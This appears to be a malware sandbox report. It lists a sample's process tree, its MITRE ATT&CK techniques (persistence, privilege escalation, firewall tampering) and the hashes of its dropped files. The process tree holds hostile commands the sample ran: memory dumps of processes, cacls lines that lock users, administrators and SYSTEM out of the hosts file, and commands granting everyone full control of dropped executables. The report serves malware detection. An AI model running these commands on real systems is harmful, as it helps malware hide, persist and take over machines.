C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2032 C:\Windows\TEMP\tteyulnen\2032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2240 C:\Windows\TEMP\tteyulnen\2240.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6612 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3488 C:\Windows\TEMP\tteyulnen\3488.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5888 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3980 C:\Windows\TEMP\tteyulnen\3980.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6944 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 212 C:\Windows\TEMP\tteyulnen\212.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5588
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2388
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:6772
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4396
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5860
-
C:\Windows\SysWOW64\jobnom.exeC:\Windows\SysWOW64\jobnom.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3736 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:81⤵PID:4132
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F1⤵PID:3364
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5040
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F2⤵PID:3684
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F1⤵PID:2008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3844
-
C:\Windows\system32\cacls.execacls C:\Windows\rkilesrw\naustif.exe /p everyone:F2⤵PID:4488
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\naustif.exe1⤵PID:1236
-
C:\Windows\ime\naustif.exeC:\Windows\ime\naustif.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1544
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F1⤵PID:6864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3888
-
C:\Windows\system32\cacls.execacls C:\Windows\rkilesrw\naustif.exe /p everyone:F2⤵PID:4344
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F1⤵PID:7004
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3120
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F2⤵PID:5656
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\naustif.exe1⤵PID:6832
-
C:\Windows\ime\naustif.exeC:\Windows\ime\naustif.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3484
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.1MB
MD57f88884b1cc8fc36028adabdb57381b9
SHA160a293ad02939a2db41a10cc2fc22372228123b9
SHA256d35eaf1b5a9addffac244ce114ce74a62201d73336bdcb72b7d78c12e43de599
SHA5123bedbf8ea9bc95c0b72512bb04dcbcfa58c98ef3ccb4879a5417328a8adc411916d5837b243ff262209b5ede29e68a01bb651b17c08ae5a618dca5f8bb7efa4b
-
Filesize
3.7MB
MD50172d38feac50b0259c1172df74d464a
SHA14f075de4eecdcd43190e148cc9de8dd1d9eb5483
SHA256c11426faaee41e207994bfac1c7b10308e2097bc7e8d44f3f7745d38841780cd
SHA5120542fcfd0b18386224f91e4666303ec347aba32af9117029a6b4754c1b3d4be96554be245e05707bbc1e5c622ed3acf37c1d6e90b07a8d344566707833322499
-
Filesize
7.6MB
MD540ea7bfbcd95783ab549542dbfa7dde2
SHA157b82c721a80b808b44b246bb2720ebad19aa394
SHA256eeb03fa31b43612010331f566977e4fa32a584c7b452b16997e31fe63c2e7211
SHA512861daaff64b3ebc2eab191eff5b67c80a4706b883f4500b3570b6f3d5cbb237ce763fc276e3d313a2caa2954f17d7132505b12ae988248fbbae4362ce0814f47
-
Filesize
2.9MB
MD5c2c05846e25e82f730db264ef59ab6bb
SHA14da4a629dfc91f8c6d00e0ddd6ebe24c73addc87
SHA25699f5a47b209de8e36f12fe320d8de32d0446c20fd320cfb3b523dc602f909854
SHA51257cf5b26f99c34b8b7815e6e2b2ece128996fe779a2fe8a205633e686af07e0e5a0012322bd42d07334ed366ca57d1f2c196c3b6006c82bfad38b9363e3a59c0
-
Filesize
814KB
MD597b77cddc3d9b6656b44f9fdb4c7fc8c
SHA1a23684afe4ae4cfe86bf151f206808c6de0a7cc4
SHA2563f63e882812fd7a97dc096ba097caf288ba4eff415d96bc572ee18911c319251
SHA5129d92d15388c051a5368497a1fca7dc06d0ad6f4a1da5b93b175d78274d83e7f38b79603f7636370601e2d84e189af33255105d8bff13ef22a24d808f5c5c5b62
-
Filesize
26.7MB
MD56d3fb4da3edfbe2a0823541efc2cbceb
SHA1293eb6af2ae54691b7c62c7227f2c3347aae9d4b
SHA256dfc924ba76bdd0ded5261a1f3309740ecaec3160eacbb9cac5552423bad21a02
SHA51213d5fb6041434e8178c2c4109aca04bc5018b8214434a71fec271a835648b11e5790b9ad9a49b997879823ed3635a58bbb2b7d68b103ccbab1f62762b48c7866
-
Filesize
2.2MB
MD5ada900713dd6e51e897afaae96fc4cd8
SHA1a80de9152d9e8f18456900b0b8091f54b37b0e81
SHA2568713f747edfef904a149a09d34e75c0030af043e4fc720ffd1bd23af230fef13
SHA512624c2f857180d22a3af15aeeef10a58905d1e59ea416b766ee47d7d2b45cc95ae22fdd22ebab672225ec83f8e0bc8748808169af9ad3e8a9330d330d2be003f2
-
Filesize
20.8MB
MD54f6e38798542094a2862a5e3d8c0debe
SHA1a1f58ceef32cfde6746c49c76b4aab0b9da7b2c8
SHA256a4299f9abfbfb3eb653c4359d0a7444d24639e6808b109bee1eeb0f142682581
SHA5123a8400630e4ceda337eceded8e7773dc963aa87f88c529bcf5a884d27bf16188842ad446381b7a7fddb9a9a94ebb5b357422b9d430470012e92709415ace5aa5
-
Filesize
5.6MB
MD5f03e5fc4ed19b5287106c69f683c5f32
SHA1f66b6cb690f4b17368714c02f65901eca0502091
SHA2564e6fe8a62574f9b4ece620247d9823af6db3ef157f6dd395dae4164ca653543b
SHA512eb9724f924da64a0563f1e84058829f0a30a79eb209653c919f819161232764c60ab1f1a155a873339102b6ef950a34c6eee201a98acf4bf0690c9394ce8b042
-
Filesize
44.7MB
MD5f678fd20ebb7ad41947527f231d77fad
SHA1b191e1db6ef38102f971e599fbf6ec4bd15888e7
SHA2563738aa502849ec0e91356e4eee3166f7529e4d0c86fab90d1ad4f511e676721c
SHA512c37d1fccccc9dc69597560d76c868ad439adf2ceba626942afa4c607f6488c4beea513eb678add92e1444fb48bd3b9aa3be1556eccaaa037427eb5e73ec11a98
-
Filesize
1.2MB
MD50f1c8cf7a242e81c02bff40e465f6d8c
SHA186c79f31e048af1acc5f1aec6f38d49fa541b1b6
SHA256ce1923b6a6480e693c05bb21f04842431840a006186b7499bebc3081c9708cca
SHA5121e1124ea8f6afaf43082592760c2fc75242c7a884e5e9dc8407e99a75add8721a35616db3f74dca25ded579085a5b1152880fe5d56fdc31c94015bb719dc448b
-
Filesize
34.2MB
MD5ef7dcac715840aa43ab93c3d7a5d7f97
SHA12be1a0db8be670685d9f13d4aba0466d6edf185a
SHA256af7d34c3e8d2980892cd506726fe143de22699d6b62dfa48fb9e5c21745ab7fd
SHA51228598a555cff1fbca23de2090df1be16198a10c468d70a1eb36d6b524670ac4dbee3fd0a4bba7436d3b2ca01894f19a45c11e3b1a17e03594a6673e4824e4136
-
Filesize
1.9MB
MD5d041e7c8a0d7cd96c4ba1d3357fd4a18
SHA110cfc52c78b402a6e94d4402115cbaf85e80a50f
SHA2560c220045871925c94a06dcae9219200d7ab0121cd3a19d91c337e9deb68e171c
SHA51275046e9ea60eaa1d44d5af15f7681d230d23d4e26aa5aeb484d96eb4ee9364d16d3edf7df470b500f124db24b29333c3f7279fef13576ccdad7f28cc44f24b4d
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
13.8MB
MD5ff226c73f99d4860f7e1d9674c77f0b5
SHA15f661819a6bd305700a9ded1df8025d8a6c5651d
SHA25674d843986ee7495fa6f381d2981d7c2898b1e974173b5e1bed2dcfa815af8f7f
SHA5127688e574bb7f4cbbb7429fed6df48d38a9f692dc62b78eb31f724f298573133243d68f9355259aa15eaf14300336a64a352f189ca648f01f9d758bf1a7e63386
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
160B
MD560672932bca7d7eccf1d23c42fafd579
SHA16d2b9b488b2ea44c0745b6cc139de7cf9c41b9f4
SHA256dad98a9c14840eec0073dcd6cff3d1fb1772484c8bcb708e3b7df537135b2bc6
SHA512775d189ad603cbc911d790a2338425ac90006f266a3c65ba7e876bd26abab258ef2fae28925b9d1df96f404f1c9a38335a4a84581458076cfb31e3252887169d
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe